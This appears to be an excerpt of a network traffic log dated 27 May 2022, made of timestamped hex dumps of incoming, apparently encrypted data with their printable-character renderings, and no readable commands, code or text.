                                                                                2022-05-27 11:26:32 UTC21INData Raw: 39 a8 e1 0c e2 90 a3 f5 2f ee 7b 92 0b 2d c7 49 e1 ac 8f d1 58 92 17 89 99 82 f0 64 ad f3 25 dd b4 81 36 b5 c5 76 22 0b de ae c2 ef dc ba 44 0a 13 5f 17 2d 32 3f 7b b0 c5 60 42 34 00 93 fc b5 18 1b 6c fd 4d 77 fe 00 aa 46 63 ff ee 37 90 a5 8c a0 e5 97 79 56 fb 88 63 bb 0b 33 cf ea 9c 4a 50 31 de 4e 7f a1 28 86 2a 2e dc 7f cf 2e 18 ef 8d 99 38 2d 51 c4 78 76 26 8d 9e d9 78 8f 8b 16 87 c9 ea aa a0 c4 c1 2a 62 0e 87 82 71 fd ff 46 7c e3 73 a8 7c d9 12 91 df 05 24 15 f0 56 a1 60 70 88 fd ae af 7b 23 b9 7d 15 dd 6e fd 3c f7 49 b6 bd 26 f2 f8 03 1a 8c 08 4c be e6 ef 1d d5 9c 0d 4e 54 39 55 1a 2a a8 eb 3a 7c b7 45 7d 93 3f ef 43 e5 a2 eb b1 89 8e c5 7a 3f 84 d3 b5 31 b0 8a b0 38 27 63 4c 1b ed 8a fc f1 af 23 7e 60 c6 0e 5b 64 eb 65 c5 3f 51 db f7 0c 35 d0 8d 17
                                                                                Data Ascii: 9/{-IXd%6v"D_-2?{`B4lMwFc7yVc3JP1N(*..8-Qxv&x*bqF|s|$V`p{#}n<I&LNT9U*:|E}?Cz?18'cL#~`[de?Q5
                                                                                2022-05-27 11:26:32 UTC22INData Raw: f9 c9 60 7e 3c 18 72 f1 70 a3 c1 68 25 92 30 81 55 81 b0 72 8e 99 87 36 bf 4f e1 85 b1 e4 74 ea 5b 8e a5 56 ce b8 e7 69 dc 9f 5e 87 31 5a 79 0b 0a 3c 3f 4d 5c a2 a7 d9 7d 01 a5 fc 5b 34 3c 92 ec 4c 9e c0 b4 79 35 c7 97 ef 29 c2 db 6f 4b d8 22 7d b8 03 e0 78 5d 45 d3 95 10 c7 6f 40 28 5d 71 10 17 73 5b 16 a2 98 a5 5a f2 31 6d e8 62 ac c2 82 b7 93 11 48 e6 7e c1 cd 4a 20 d4 88 10 b1 7a 7b 0a 2d eb d0 1f 24 14 fc 11 ed dc 7f ff cb 29 4f 75 75 66 2d 00 41 c7 d4 aa 0a df b4 e0 4a 86 6d 4d 1b f9 d7 fe fc ab ed 33 80 69 f9 15 19 a1 e0 60 40 28 e8 29 7b 73 45 59 8b 3d c1 09 e7 36 b2 27 da 8c e5 3d 6e 86 fc 78 78 42 b6 50 1d 5f 03 85 ba c0 0e f9 dd 69 d2 24 44 48 6f bb bf 05 b2 5a 7f a1 62 38 cb e5 16 f4 70 6d 35 39 d8 6d 84 0c c7 4e 66 15 08 1e 82 b2 cd e5 30 d5
                                                                                Data Ascii: `~<rph%0Ur6Ot[Vi^1Zy<?M\}[4<Ly5)oK"}x]Eo@(]qs[Z1mbH~J z{-$)Ouuf-AJmM3i`@(){sEY=6'=nxxBP_i$DHoZb8pm59mNf0
                                                                                2022-05-27 11:26:32 UTC24INData Raw: 7b 71 2a 01 00 9f 62 50 d6 f4 3e 06 a0 f9 b5 60 20 f9 4e 99 4f 0a 6b 39 8a ca df e5 c9 f5 72 04 ec 9c d5 7f 75 81 7b 66 c4 3e 8e e6 af 2f 09 c2 0c b2 6c b8 47 50 36 dd 3b 6a 71 67 62 8c e6 74 72 19 7e 3e 35 ed 2a 4b 6b 83 01 86 2d 8f 54 9e 7c 4f 9d c8 6b 3e ec 50 f2 71 93 d0 fa b9 21 ea c8 ac eb 1d ed c6 e9 53 73 ed 91 4f ae 71 cc 95 c7 c4 9b 48 1e 84 04 6f 41 7f bf 58 6c 2d 62 59 32 0a 67 eb 7a 7d 09 35 7f 73 85 ca de ca 13 05 c8 47 5c 88 44 eb 87 71 60 d7 bb a0 00 6b c5 5d c5 f6 7b 22 07 ad 11 c2 15 cf 06 86 a6 02 ac 61 14 09 65 a6 9a 2a 16 c5 6f b7 c1 d0 37 41 2f ff e9 fe 46 0c 9e 82 22 5a b5 34 e6 c6 86 7e 89 38 1d 5b dc cb a5 ed 87 e7 4b 6a 4c d3 80 76 b4 f5 88 f9 cd 78 ec 39 32 c1 83 bf a7 7e f5 d2 ce 19 7a c5 fc 78 05 31 12 3f 9a b9 56 1c a4 28 2c
                                                                                Data Ascii: {q*bP>` NOk9ru{f>/lGP6;jqgbtr~>5*Kk-T|Ok>Pq!SsOqHoAXl-bY2gz}5sG\Dq`k]{"ae*o7A/F"Z4~8[KjLvx92~zx1?V(,
                                                                                2022-05-27 11:26:32 UTC25INData Raw: 0a d0 15 8d 78 f6 d2 1f 56 d3 ab 9c dd c9 9e 52 8b 9d fc f9 64 ad f7 5b 0b 4b 7e cd 43 c4 03 3f 01 5e a6 d6 11 db 76 9a 1f ed 5c 4a 23 44 1a 9c cf 93 9e 53 44 35 85 fe b4 36 1e 4f fd 47 a3 b7 29 99 46 6d a2 7b 06 91 a5 84 c5 92 b5 66 04 f7 a0 4d bf 23 2e e7 ea 9b 72 73 31 df 44 ff a8 9b 4f 2e ff f0 7c cf 2e 01 c0 fb aa 43 53 58 c4 39 72 0e 84 b4 dd 7e a7 ae 79 b2 c2 6a a9 a2 ec f3 f6 e3 07 e8 b5 72 e2 86 62 e8 c7 7a a8 7d d0 33 9e c2 08 bf 34 bc 6e a0 6a fa 8a fe b8 9a ae 47 b9 6a cf 45 7b 57 23 ed 21 90 b1 21 f1 5e ae 1b 5a 19 be 07 ec 31 0b 7d 6f 0c 4e 56 ee ce 0d 0f 80 c4 25 09 8e 50 2b 60 3e ef 41 c7 91 c7 b1 8f ac 38 7a 39 a4 53 bc 30 a0 8e 6d 1f 24 63 4c 55 be fc db f5 d1 2a 7f 7b f2 25 47 4a eb 63 ed 03 51 db ec 8e 3f f8 b4 12 af 59 28 18 e6 ef 9f
                                                                                Data Ascii: xVRd[K~C?^v\J#DSD56OG)Fm{fM#.rs1DO.|.CSX9r~yjrbz}34njGjE{W#!!^Z1}oNV%P+`>A8z9S0m$cLU*{%GJcQ?Y(
                                                                                2022-05-27 11:26:32 UTC26INData Raw: e6 f9 a6 e9 7a 25 81 32 e4 49 97 a6 fc 5f ad 87 37 19 74 b3 ef ad db 75 ee 53 a0 9e 11 cf b2 99 6e d8 80 57 14 0e 5a 68 04 38 c2 3e 72 65 d5 56 68 7c 0b ae d0 48 3f 2d 95 f4 5c 58 50 99 7a 2d d4 8d e8 27 c7 3b 90 66 cc 3d 6a b5 12 f6 41 4c 45 d1 f0 09 d9 66 59 0b 48 61 1b 00 a8 77 3f 88 98 a8 67 68 71 c5 16 9d 51 ad 80 bc 93 02 50 fc 62 3a b7 5b 3c d6 8a bc 3d 26 7b 00 3a f1 f7 1d 23 14 e7 3e fe 22 7e f8 a7 74 5d 72 7f 68 25 0d b4 c6 e9 96 15 24 b2 40 58 91 7e 44 74 fc dd e1 e6 7d f9 1e 82 48 d9 00 e3 7a 0e 9b 69 08 91 2b 4b 71 47 a8 9a 3d c1 4e f4 33 b1 34 ac 89 8e 3d 6a 02 93 29 61 bc b1 63 10 5a 08 9f a6 c7 18 ea dd 69 d2 29 57 e8 74 b6 bf 13 a0 b7 79 8d 7b 17 9c e8 e8 ff 56 7f 46 0d d1 76 7e 1e ed 46 6d 0e 95 71 da b4 d6 11 33 96 55 53 b2 31 9f a7 3e
                                                                                Data Ascii: z%2I_7tuSnWZh8>reVh|H?-\XPz-';f=jALEfYHaw?ghqQPb:[<=&{:#>"~t]rh%$@X~Dt}Hzi+KqG=N34=j)acZi)Wty{VFv~Fmq3US1>
                                                                                2022-05-27 11:26:32 UTC28INData Raw: 23 28 0b c8 3b 3c fa 9b 19 70 f4 4e 94 57 dc 78 14 87 c8 d5 cf c9 f5 7a 04 eb 9c d5 7f 43 ee 79 6d a5 88 8f ca a1 2f 09 30 0d b2 6c e0 16 4b 3b df 4f 3c 8f 66 4a ac a4 74 27 4b 7f 3e 3b f0 50 66 6a 8a 17 17 0d a2 50 bf bb 18 92 ca 0d 04 13 51 d4 52 f4 c8 e3 cc 60 a2 c8 a6 e4 2e ae c4 8f 68 8c ec b7 46 d2 3b da bd 48 ec fd 4e 12 98 2f 45 48 62 41 4a 70 20 6a 12 4e 45 67 d1 7e 63 15 23 7a 5d 40 ca f2 c8 04 00 d5 b0 42 ad 9a e8 d0 3a 4b d2 87 c9 d7 b7 3b 55 e5 f5 40 36 04 ad b7 c1 3d ea 4c 86 ac 3b dd 6d 2c 91 43 b8 96 2a 16 c7 6f b7 c1 d1 08 9c 52 b0 e9 e1 4b 1d 92 8a 35 48 b5 34 e6 c1 f7 f8 a1 1d 1a 50 cf ba ec e5 99 1d 55 4d 4a d4 90 1c 18 f4 a4 ff ca 7d e0 31 26 22 7c 92 82 70 f0 bf c1 57 7a c3 e5 6a 09 39 03 da 65 94 7d 20 10 c6 30 dd 08 9c ee 33 4b 08
                                                                                Data Ascii: #(;<pNWxzCym/0lK;O<fJt'K>;PfjPQR`.hF;HN/EHbAJp jNEg~c#z]@B:K;U@6=L;m,C*oRK5H4PUMJ}1&"|pWzj9e} 03K
                                                                                2022-05-27 11:26:32 UTC29INData Raw: 3f 60 ee ba 8d d9 a3 d7 17 89 99 f4 96 0d ac f7 51 af 2f 81 32 9b f9 7d 31 04 5e b6 c7 f0 d5 99 9e 25 1f 57 04 36 7c 7d 9d 31 33 7f 4c 23 2d 85 ef b0 04 cd 4e d1 48 6b 75 12 b9 43 67 33 56 2b 9c 5b 8f 93 9c ac 77 fe fe 97 6e ac 26 24 dc ef 85 6c 8d 30 f2 48 fd d3 78 86 2e f7 6f 71 d0 21 09 f5 ff bb 24 4c 49 3a 79 5e 1e 97 9b b7 fb a1 c6 93 e8 5e 6a a3 a6 db d7 e4 e6 0d 96 87 6c f6 72 74 49 92 78 d3 32 dd 3a 8c b2 7f 22 3d d9 49 b4 79 f5 81 ec ab b2 58 41 96 6d 17 a4 3f 89 0f ea 58 e0 bc 26 fc 68 13 02 9f 0b 64 8c e3 f0 05 ab 94 21 41 52 9f 5e 19 2a ac d0 ce 09 84 5c 1c 89 2c ea 47 dc bc f2 4f 8e 8a ed 78 44 de 53 bc 35 9c a0 71 0c 21 63 5d 1c ed f3 31 e9 fd 30 7c 67 c0 5d 17 66 eb 67 63 ab e9 0c 93 09 3a be 08 7c 32 53 2d 09 2f 65 87 e2 b1 ba 80 6d f8 02
                                                                                Data Ascii: ?`Q/2}1^%W6|}13L#-NHkuCg3V+[wn&$l0Hx.oq!$LI:y^^jlrtIx2:"=IyXAm?X&hd!AR^*\,GOxDS5q!c]10|g]fgc:|2S-/em
                                                                                2022-05-27 11:26:32 UTC30INData Raw: 48 f4 41 8b 96 72 75 e3 87 36 bf 74 bf ed 9f 8b 49 ef 59 ac 90 46 ca a4 bb 16 dd 9f 56 69 25 0a 32 0c 24 56 11 5c 7a 8c a4 13 25 01 a5 cd 4d 07 24 86 84 05 a6 51 b1 74 1e dc 85 93 6f cc 25 6a 79 d3 23 79 c6 4a 6c 69 59 53 c6 89 77 c7 6f 40 0d 63 72 06 37 76 89 ec 84 89 2c 5e f8 48 7d e2 60 d5 fd 93 b7 97 10 20 bd 6c c4 b2 61 4f a6 8d 94 d4 00 78 71 70 f4 df 08 28 3f cb 1f fc 34 79 d5 46 86 36 5a 01 76 2a 14 08 a9 c5 9c 03 d0 a0 69 5f 80 7b 5e 71 82 a2 fe f6 89 ff 23 85 db b2 e2 17 80 e7 0e 5b f7 95 57 01 73 47 22 99 46 98 0b f4 37 be 11 a7 b8 8a a3 6a 02 99 37 52 42 ab 7f 17 4c 2b 85 ab c7 47 f0 23 79 8d 9b 7c b5 65 b7 bd 19 b0 26 ed a1 73 39 f8 e5 ec fd 33 2e 4b 0d d2 3c 97 14 1f 40 6f 12 5e 08 98 6b dc 13 1d ff 17 3d ef 3b b7 e6 e3 c8 c4 aa f4 3f ea 53
                                                                                Data Ascii: HAru6tIYFVi%2$V\z%M$Qto%jy#yJliYSwo@cr7v,^H}` laOxqp(?4yF6Zv*i_{^q#[WsG"F7j7RBL+G#y|e&s93.K<@o^k=;?S
                                                                                2022-05-27 11:26:32 UTC31INData Raw: b7 1b 6c 96 d1 9d 4c 24 51 44 8b c0 a1 eb d3 9a 04 79 a4 96 ca 6a 4c e5 79 75 b9 69 87 18 aa 00 1d d3 76 fc 66 cc 5b 4c bb f0 46 22 70 74 63 b7 a9 60 45 56 e3 2f 3a f8 46 20 f6 92 0e f1 15 12 45 91 4f 1f 03 db 01 06 f2 44 64 48 f3 cb ec 23 4d a6 de b0 80 43 a3 c4 8c 6e 78 fe 9d 4d c4 3e d3 9e 3d ed d1 42 3e 82 2a 45 41 72 a0 47 4f 2f 62 00 35 1c 99 d0 56 7e 0f 30 75 4b af cd c1 dd ed 0c f9 bb 76 a1 5c 65 01 c7 9f fd bf a3 28 5b f4 59 cf 47 50 06 06 f7 1b c1 2c fc 14 80 94 8e c8 61 14 0f 52 be 89 3b e0 da bd aa ef a3 41 9f 2f fb ea 9a 2f 00 9e 8e 15 2c 4a 35 c0 df 9e 12 d5 1d 1c 51 c9 a4 ff eb 87 f2 52 7e 5a 2d 89 4d 51 f6 df b5 d5 74 e8 11 2e be 82 93 86 02 f6 bd b6 0f 62 ac 95 74 05 33 14 da 88 93 51 35 3d 37 30 2f 09 b8 ed cf 31 6a 42 2c 76 f6 62 a6 67
                                                                                Data Ascii: lL$QDyjLyuivf[LF"ptc`EV/:F EODdH#MCnxM>=B>*EArGO/b5V~0uKv\e([YGP,aR;A//,J5QR~Z-MQt.bt3Q5=70/1jB,vbg
                                                                                2022-05-27 11:26:32 UTC33INData Raw: b1 15 f2 d3 fc f9 60 b7 7a 74 c0 b4 80 3f 94 f0 69 72 9d 57 b0 dd a4 44 6e 87 15 8f 56 0c 2e de 05 74 d4 a3 14 42 30 22 9e ed b1 1e 22 4b e2 5c 83 7f 25 bd 44 1c 6c 53 34 94 b2 a6 c3 95 a4 6a 3e e8 e7 17 bf 23 2e d2 f8 89 66 73 20 da 5b eb 56 29 aa 28 d8 4e 63 da 3d 1e f0 ee ae 3e 45 a6 c5 54 63 06 97 e7 96 7e a7 ac 79 d5 c3 6a a9 ab db d2 e4 e7 0d 96 86 6b 1c 8d 59 6a 9f 01 e6 7c dd 3e e7 a3 04 22 37 d9 4f b2 6e f0 90 f9 b1 a7 58 41 96 6a 17 a4 3f 89 0f ea 34 97 c0 27 f6 da 0f 06 e3 7a 64 9d ec f0 1a 46 91 0d 5f 54 fa ee 18 06 bf eb 5e 47 84 5c 07 8c 17 93 46 cd b3 ff ab e0 d2 e6 7a 35 91 5a af 35 b0 9f 69 00 2a 9d 4d 35 d9 fe b4 a6 d1 2a 7a 7a 4f 09 47 66 ea 6e e4 0a 4e 8b 61 85 2b cf c6 8f a6 4b 31 93 39 6c 89 7b b8 bd 9f 1f 72 03 2b 90 45 2c 3b 0f c1
                                                                                Data Ascii: `zt?irWDnV.tB0""K\%DlS4j>#.fs [V)(Nc=>ETc~yjkYj|>"7OnXAj?4'zdF_T^G\Fz5Z5i*M5*zzOGfnNa+K19l{r+E,;
                                                                                2022-05-27 11:26:32 UTC33INData Raw: f5 5c 62 5d 25 a4 6c 80 15 d7 4b 04 72 0f 1e 99 aa dc 08 35 f9 0e 56 ad 36 49 ed 13 d8 ec d1 bb 2f ea 57 83 21 50 c0 61 c8 ba 91 b4 ac 9b 17 83 82 f2 ea 60 ad e6 5f df be 7f 33 b1 cf 74 59 4f 5e a7 c6 ed a3 2b 9f 09 17 30 7f 33 42 06 08 cc b7 31 42 30 2c 53 d6 c8 1f 33 45 eb 53 12 0a 09 aa 4c 78 29 40 30 90 b4 8a a9 6a a5 4c 2b e5 9b 67 bf 32 20 d2 f1 64 63 5f 33 f5 41 c7 9e d4 79 d1 d9 43 6f ff 2b 1a b9 fc aa 21 0e 58 c4 69 64 1d 9d a4 e2 7d a7 a8 16 96 cb 75 82 5e c5 e9 e7 e1 76 c9 82 73 e6 85 1a e5 9c 7a a2 63 ff 29 80 dd 14 2a 22 cc a8 a0 46 fc 82 ad b8 d6 ff 40 ba 79 0a ff 62 81 0f ff 3f a0 aa d8 f7 fc 13 10 e3 90 64 9d ec f0 0f 46 9d 0d 5f 58 fb 03 e7 2b 84 e4 34 0f 95 5b 40 e0 3d ef 47 d2 ad fa b9 8f b7 ee 67 c1 8f 7f b6 33 cb c0 6d 1f 20 6f 52 0a
                                                                                Data Ascii: \b]%lKr5V6I/W!Pa`_3tYO^+03B1B0,S3ESLx)@0jL+g2 dc_3AyCo+!Xid}u^vszc)*"F@yb?dF_X+4[@=Gg3m oR
                                                                                2022-05-27 11:26:32 UTC35INData Raw: 82 72 f4 a6 d8 06 45 9c 65 79 18 2a 03 c1 8a 9d 4b da 3a 04 20 d2 17 84 9d d2 55 7b c6 26 69 e2 7c a1 f8 72 3b 99 c4 f4 6d 8a 98 3b 0e ad 8d 25 be 7a b7 e8 8d e4 65 e6 46 ab 48 56 e2 a6 81 78 cd 98 4d 03 03 52 70 1e 26 14 b8 5f 6c ac b8 66 6f 09 a5 d8 53 2d d3 85 d3 46 a5 4e a0 1d 2a c8 d9 6c 25 c8 3f 7d 6f e0 22 73 ab fa 6d 45 5e 52 c2 f2 04 d7 67 55 0e b6 71 3c 1f 7d 73 2b 59 77 5e 8e e9 4d 56 e8 62 bd 83 90 b7 2e 12 5b e3 33 c4 b6 66 36 d8 b4 3b df 26 7b 0a 23 ef 21 0d 0f 1b fa 3e 81 23 7e d9 ce 2f 33 80 75 77 20 02 b3 c6 f0 82 0e 24 b2 40 49 99 75 67 0f ec d6 f4 f0 9c d6 5d 72 63 dc 32 03 89 fd 64 63 3d 9d c6 7a 5f 56 3f b2 46 c0 0b fe 35 bf 0e ce 43 e5 3d 60 1d 9e 2c 78 4a af 40 ea 4d 28 9e a8 bb 72 f0 23 6c d6 a5 7d b5 65 93 c2 1b b8 43 7e be 4b 50
                                                                                Data Ascii: rEey*K: U{&i|r;m;%zeFHVxMRp&_lfoS-FN*l%?}o"smE^RgUq<}s+Yw^MVb.[3f6;&{#!>#~/3uw $@Iug]rc2dc=z_V?F5C=`,xJ@M(r#l}eC~KP
                                                                                2022-05-27 11:26:33 UTC36INData Raw: 3c 06 eb 63 e9 34 2d da fd 86 2a ca e2 67 af 53 27 12 3b 75 93 ff 4f aa a9 7e 04 78 65 9a 5a 27 47 54 c0 2c c8 f1 ae 10 68 fe 50 63 4d 0e 58 3a f1 8e ab fd cd f7 73 02 ff 9c d5 7f 30 7f 79 64 b9 5e f2 e7 ab 26 37 cb 62 c6 66 cc 55 4f 3f d4 46 25 68 99 67 8a ba 74 21 48 7f 3e 3b ec 22 36 6a 83 0f f7 66 58 3b eb 57 05 95 d0 0f 1c ea 4b 06 58 da c7 f8 c4 12 a3 c8 a8 ec 4c fe c4 86 75 6d e3 f1 9b ba 47 cd 95 c9 f0 f6 48 19 9f dc 44 6d 5f bd 30 12 29 62 15 31 09 1c 8d 7a 7d 1c 4c ef 4b be cd f6 b6 12 0d df af 47 cb 10 e9 fc 32 7e dc bf a4 32 b6 c5 71 d5 f7 28 48 06 ad 1f c2 46 b3 07 86 a8 02 b0 60 14 05 55 a0 f9 5e 1e db 9b ad e6 d8 08 88 d1 fe c5 e3 57 0b 9e 8d 22 59 b5 34 e6 c6 86 06 ef 1d 1c 5f d0 d9 93 ec 87 e9 4b 6b 4b d3 8f 77 b4 f5 88 f9 c2 7f ec 36 31
                                                                                Data Ascii: <c4-*gS';uO~xeZ'GT,hPcMX:s0yd^&7bfUO?F%hgt!H>;"6jfX;WKXLumGHDm_0)b1z}LKG2~2q(HF`U^W"Y4_KkKw61
                                                                                2022-05-27 11:26:33 UTC37INData Raw: 81 13 c9 7d 2c 04 0a 90 24 c8 61 1b 31 fd 1d 50 c9 8c b7 ec 3b e7 7a ab f5 25 97 e5 87 09 29 c4 77 c0 d7 39 db d8 9f 15 f2 2a fc f9 60 85 62 5a c0 be 83 37 13 51 0b 9b 01 5e a3 c0 ed a3 de 9f 09 17 77 81 33 42 06 1f 76 cc 60 46 1a 28 85 ed 85 1c 33 72 fc 4d 7d 1b 09 aa 57 71 31 57 0c bf a4 8e bf 94 b5 64 37 ff 76 62 93 2c 26 b6 52 9a 62 77 19 48 45 ff a2 37 88 3d f7 43 6d cb 33 e4 f1 d3 a4 23 28 ee c4 78 76 26 03 9d d9 74 b9 bb 12 87 d2 6e b8 5e c5 e9 e3 e1 76 31 82 73 e6 f2 64 64 9d 70 80 66 dc 3a 82 d6 19 31 39 d3 47 a5 70 0e 80 d1 a0 a9 dd f2 ba 7d 11 f7 e7 88 0f e4 2c ac b9 26 e7 d4 0e e6 8d 22 67 85 f5 eb 17 44 91 14 b0 51 c8 16 1f 06 68 f3 36 0d 84 4d 07 86 c1 ee 6b cb be c5 fd 92 b5 e2 7a 2e 8a 4c b0 cf b1 a2 67 16 1d fd 4c 19 f2 e3 c2 fb d5 2a 6f
                                                                                Data Ascii: },$a1P;z%)w9*`bZ7Q^w3Bv`F(3rM}Wq1Wd7vb,&RbwHE7=Cm3#(xv&tn^v1sddpf:19Gp},&"gDQh6Mkz.LgL*o
                                                                                2022-05-27 11:26:33 UTC38INData Raw: 1e b0 75 05 39 03 d7 0a 82 7f 2f 1b 2d 2c d1 88 9e 24 8d 4b 24 42 24 65 60 62 8f e2 5a 26 92 3a 75 4b 5c 9f 71 0e ad ac 27 b3 72 2a ed ab ef 54 ec 59 a6 36 5d 13 ae 92 7d dc 91 58 2b 2c 59 51 de 20 3c 39 47 5f 86 a9 6c 7f 6e 7c c9 5b 32 3e 80 ee 4f 8b 56 af 73 e8 3d 86 e8 36 dd 21 01 72 e0 33 71 43 0f 6d 69 5f 52 d2 d2 d5 c6 6f 4c 03 4c 58 c6 1d 56 70 7c 53 89 a1 7b de 4a 74 87 bb ae b3 99 ba 9a 0d 74 e8 4c c1 b6 77 a0 de 51 57 de 26 7b 02 3d 65 c4 22 28 34 e8 16 fa a2 74 0e 7a 31 5c 72 7d 60 bb 00 8e cd d8 98 03 da 33 66 86 27 6d 4f 74 e5 c1 6f e0 ad f1 3a 97 f2 d6 e5 8e 87 f1 64 63 3a 00 2e 55 78 67 2d 9a 3d 41 01 29 b2 a0 22 a1 b9 fc ac 7d 2c 87 28 61 d3 a9 61 1a 44 1d 14 b1 e9 19 d0 26 68 fe ad 76 6b 08 b3 a6 8b b3 4e 6f 92 7e 36 cb e3 c6 d8 7c 63 4b
                                                                                Data Ascii: u9/-,$K$B$e`bZ&:uK\q'r*TY6]}X+,YQ <9G_ln|[2>OVs=6!r3qCmi_RoLLXVp|S{JttLwQW&{=e"(4tz1\r}`3f'mOto:dc:.Uxg-=A)"},(aaD&hvkNo~6|cK
                                                                                2022-05-27 11:26:33 UTC40INData Raw: eb ff 8c 1f d0 8d 13 aa 53 2d 1e 26 7e bf fc b1 ac 92 8e 07 2f 29 82 51 23 2f 1d 3f 2d ee f9 a0 10 68 fe 56 63 4d 0e 7b 13 88 eb 48 eb e3 f5 63 49 a6 9c fd 7b 5f e3 7f 64 bf 67 98 ed 80 37 21 d6 1a 4c 67 e0 5d 48 3d df 41 34 8f 66 4a a4 bb 7d 5a 01 67 c0 3e c3 5b 40 68 a8 e8 eb 77 49 54 94 52 2f bd c8 07 61 2a 50 f8 5d dc d0 fa bf 4f 93 ca ac c7 37 a3 c4 f7 71 72 fc 8d 46 fe 23 cc 92 d4 12 fc 64 1c 9a 29 45 46 69 41 4a 70 2b 75 1a 33 0d 7f 2f 7b 51 1a 08 71 60 5d c9 a5 02 13 0d d1 93 7f a6 67 94 34 38 60 d3 95 a3 28 48 d7 6d ca f5 49 06 06 ad 69 c1 3d fb 05 91 21 04 cb 61 16 05 45 ae 95 2e 6d 36 91 b6 eb 7a 09 9a 07 1b e9 e1 49 2a 9e 8a 2e 60 4c 35 d4 c9 84 7d d3 1d 1c 4a d4 a1 61 c3 87 e3 56 6b 46 c5 8b 65 4f fa a0 88 3b 74 ec 37 8c 39 8c 96 86 9d f7 bd
                                                                                Data Ascii: S-&~/)Q#/?-hVcM{HcI{_dg7!Lg]H=A4fJ}Zg>[@hwITR/a*P]O7qrF#d)EFiAJp+u3/{Qq`]g48`(HmIi=!aE.m6zI*.`L5}JaVkFeO;t79
                                                                                2022-05-27 11:26:33 UTC41INData Raw: 1e 93 b4 d6 1b 31 f9 20 50 b2 3b a4 ec 3f cf bc a8 f5 2f e6 53 87 09 30 c1 61 c3 ac 8f db d8 8f 17 89 9d df fb 64 ad c0 59 c0 b4 af 32 9d e6 6b 22 01 5f a5 c2 ef d8 73 9f 09 13 0e 17 32 42 69 60 ce cc 7c 42 30 28 85 fe b5 1e 28 7f f5 4d 7b 7a 09 aa 33 67 22 42 37 84 f4 8a aa c0 a1 74 79 fc 8c 75 ed 2d 21 d9 bb 8e 69 71 23 df 4a f9 80 c0 86 2e f5 6e 7e d9 04 69 a7 ff aa 2b 59 5f d3 f5 28 0e 95 9d ca 6d b6 bb 00 98 c9 f7 b2 b3 ab fd f6 e3 07 94 97 65 f1 98 5e 2c 8c 6f b9 68 47 29 8e cc 03 35 b0 89 56 a1 6b e3 97 ec b8 bd b9 4d 27 6c 03 b0 de 88 0f e4 58 b8 bc 26 fc c6 28 05 8a 1f 62 8a 6b b5 17 55 94 1e 59 41 f3 06 06 27 35 f8 32 66 2b 5d 03 90 50 b4 47 cd b3 f8 a5 98 70 f5 6e 2e 9a 42 a9 bf 07 bc c2 19 32 0c fc 18 f2 f6 d8 65 8b 2a 7e 61 d1 31 56 71 fd 7c
                                                                                Data Ascii: 1 P;?/S0adY2k"_s2Bi`|B0((M{z3g"B7tyu-!iq#J.n~i+Y_(me^,ohG)5VkM'lX&(bkUYA'52f+]PGpn.B2e*~a1Vq|
                                                                                2022-05-27 11:26:33 UTC42INData Raw: 9b 84 5a 3a c5 29 00 c4 0a b4 f9 cd 4a a4 6a d8 70 f1 72 89 03 7a 24 94 1c ea 48 92 bb 70 1f a6 9e c8 ba 49 bd ff 91 b5 6e fd 52 a6 a7 5c d8 4c 92 51 df 88 4f 0c 05 4b 72 10 2b c2 3e 72 6e 8d a2 50 59 fe 5a 36 4a 30 3c 82 29 58 a2 59 a4 7f ef cb 81 9c 3a cc 25 75 71 e9 2a a1 95 be 6d 69 57 54 d5 e8 04 ee a0 4a 00 4e 5c 9d 1e 7e d5 13 84 83 a6 05 f4 48 7c f3 74 a8 dc 4b b7 93 19 0a f2 68 c2 8d 63 21 d4 8c 85 da 20 a1 19 2c f0 ce 0b 34 ce fa c0 77 0d 7e d3 c9 60 48 a2 f7 77 2a 1f 97 d2 f8 9d 09 f2 e6 6e 5b 80 76 c2 73 ed d6 ff e5 8b e9 3a 96 64 f4 29 1c 87 fb c6 7a 2a 86 3e f7 22 47 28 9b 9f d0 03 ec 37 f0 80 b0 b9 fc 2b e6 53 93 20 79 e0 a1 47 0e 5d 03 09 fa c7 11 f1 81 79 f6 3e 75 a4 66 af ab 01 35 1b 78 a1 72 2c de f8 e2 e3 4b fa 5a 07 cf 7a 1c 0e cb 49
                                                                                Data Ascii: Z:)Jjprz$HpInR\LQOKr+>rnPYZ6J0<)XY:%uq*miWTJN\~H|tKhc! ,4w~`Hw*n[vs:d)z*>"G(7+S yG]y>uf5xr,KZzI
                                                                                2022-05-27 11:26:33 UTC44INData Raw: af 53 29 10 21 66 92 e7 a0 ad 9c 8e 07 2f 2f b0 40 30 2e 0b d0 2a dd f6 49 1a 44 f6 4c e6 9f 22 79 3c a2 13 ab fd cf ea 7e 6a a2 9c c4 7d 40 f5 87 65 93 7d 8c f2 d6 fa 21 d1 09 ad 71 df 59 50 27 d9 59 2b 8f 66 4a ad ae 62 27 dc 7f 3e 3b f0 53 78 6c 83 1a ef 12 70 55 b8 46 07 e4 10 04 1c e9 47 85 85 f6 d0 fe a0 55 b0 ce ac fe 31 bc ca 78 70 5e eb 8f 40 ca 37 df 93 c3 fd fb 57 0d 7c 23 69 4c 6e bb 3f e8 29 62 10 20 0f 78 c5 69 7b 18 32 75 54 b2 35 df e6 1c 0f ae 6b 5d a4 60 c1 2f 38 60 d1 a0 ae 3b 4e c4 4c c9 e3 ad 07 2a ae 0c d2 3b ea 16 80 b3 3d 35 60 38 0d 68 bd ae 06 e0 24 6e 9c ed d8 0f 84 1f fa e9 14 4f 00 9e 8a 3d 50 4b 37 b1 15 84 7d a5 31 17 59 b9 46 ec ed 81 3e b5 61 40 d3 8a 1a 9d f4 a4 ff f9 5d ee 27 53 e8 82 93 aa 7b e2 c0 65 19 7a c7 e3 0f d1
                                                                                Data Ascii: S)!f//@0.*IDL"y<~j}@e}!qYP'Y+fJb'>;SxlpUFGU1xp^@7W|#iLn?)b xi{2uT5k]`/8`;NL*;=5`8h$nO=PK7}1YF>a@]'S{ez
